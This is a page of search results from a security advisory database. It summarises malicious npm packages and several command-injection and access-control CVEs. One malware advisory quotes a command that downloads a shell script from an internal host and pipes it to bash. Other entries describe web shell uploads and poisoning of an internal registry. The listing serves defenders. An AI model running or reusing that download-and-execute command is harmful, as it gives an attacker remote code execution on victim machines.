30851 matches found
Malicious code in internallib_v856 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a The package's main entry index.js exports a single function command that invokes /bin/bash -c "curl -s http://10.0.0.145:8080/shell.sh | bash || wget...
Malicious code in internallib_v984 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8 Package exports a single command function that, when invoked, performs three coordinated attacks against the host: 1 appends a hardcoded...
CVE-2026-12059
The SSH service of CelloOS developed by Cellopoint has an Improper Access Control vulnerability, allowing authenticated remote attackers to bypass the enforced command restrictions and execute operating system commands outside the originally authorized scope...
CVE-2026-12059 Cellopoint|CelloOS - Improper Access Control
The SSH service of CelloOS developed by Cellopoint has an Improper Access Control vulnerability, allowing authenticated remote attackers to bypass the enforced command restrictions and execute operating system commands outside the originally authorized scope...
linux-privesc-linpeas
🐧 linux-privesc-linpeas End-to-end Linux privilege escalati...
Chamilo LMS <= 1.11.24 - Remote Code Execution
Unrestricted file upload in big file upload functionality in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS = v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell. id: CVE-2023-422...
Pinger 1.0 - Remote Code Execution
Pinger 1.0 contains a remote code execution vulnerability that allows attackers to inject shell commands through the ping and socket parameters. Attackers can exploit the unsanitized input in ping.php to write arbitrary PHP files and execute system commands by appending shell metacharacters. id:...
PT-2026-48830
The SSH service of CelloOS developed by Cellopoint has an Improper Access Control vulnerability, allowing authenticated remote attackers to bypass the enforced command restrictions and execute operating system commands outside the originally authorized scope...
CVE-2026-42846 ClipBucket: Remote Play URL Command Injection
ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - 140, ClipBucket's Remote Play feature allows any authenticated user to add a video by importing an external URL as the source. Some shell commands are run with the URL as a parameter. The URL is concatenated directly...
EUVD-2026-36367
ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - 140, ClipBucket's Remote Play feature allows any authenticated user to add a video by importing an external URL as the source. Some shell commands are run with the URL as a parameter. The URL is concatenated directly...
CVE-2026-45172
Due to incomplete input validation in Idira Privileged Session Manager for SSH PSMP versions prior to 15.0.2, 14.6.3, 14.2.5, and 14.0.6, an authenticated, low-privileged user could potentially execute arbitrary commands on the PSMP host. CyberArk Security Bulletins: CA26-17 and CA26-18...
Malicious code in internallib_v557 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 275af9596caf2b68994ca8282da7e127f8a4478e07888dbae73826328b4e41f2 index.js implements a multi-step attack against an internal npm registry. On invocation of the exported command, it: 1 creates a Verdaccio user...
MAL-2026-5678 Malicious code in internallib_v557 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5cfa498f80e5965de3c072803c8d6e812e75bc5a4fb031f739cbd9c181724be3 internallibv557 has no legitimate functionality — its single exported command function in index.js writes a malicious package.json to...
CVE-2026-45172
The CVE describes an input validation flaw in Idira Privileged Session Manager for SSH (PSMP). A authenticated, low-privilege user could potentially execute arbitrary commands on the PSMP host due to incomplete input validation in PSMP versions prior to 15.0.2, 14.6.3, 14.2.5, and 14.0.6. Affecte...
CVE-2026-53806
OpenClaw before 2026.5.12 contains a shell option parsing vulnerability that allows combined POSIX shell flags to bypass exec revalidation checks. Attackers can exploit this by using combined shell options to execute inline shell content without intended allowlist validation, potentially enabling...
CVE-2026-53806 OpenClaw < 2026.5.12 - Shell Option Parsing Bypass in Exec Revalidation
OpenClaw before 2026.5.12 contains a shell option parsing vulnerability that allows combined POSIX shell flags to bypass exec revalidation checks. Attackers can exploit this by using combined shell options to execute inline shell content without intended allowlist validation, potentially enabling...
CVE-2026-53806 OpenClaw < 2026.5.12 - Shell Option Parsing Bypass in Exec Revalidation
OpenClaw before 2026.5.12 contains a shell option parsing vulnerability that allows combined POSIX shell flags to bypass exec revalidation checks. Attackers can exploit this by using combined shell options to execute inline shell content without intended allowlist validation, potentially enabling...
CVE-2026-53806
OpenClaw vulnerability CVE-2026-53806 affects OpenClaw prior to version 2026.5.12. A shell option parsing flaw allows combined POSIX shell flags to bypass exec revalidation checks, enabling execution of inline shell content without the intended allowlist validation when the affected feature is en...
EUVD-2026-36312
OpenClaw before 2026.5.12 contains a shell option parsing vulnerability that allows combined POSIX shell flags to bypass exec revalidation checks. Attackers can exploit this by using combined shell options to execute inline shell content without intended allowlist validation, potentially enabling...
CVE-2026-47162
Vim (with the netrw plugin) is affected by CVE-2026-47162 due to a Vimscript code injection in s:NetrwBookHistSave() when serializing directory paths to the history file ~/.vim/.netrwhist. A directory name from the filesystem can be interpolated into a single-quoted Vimscript string literal witho...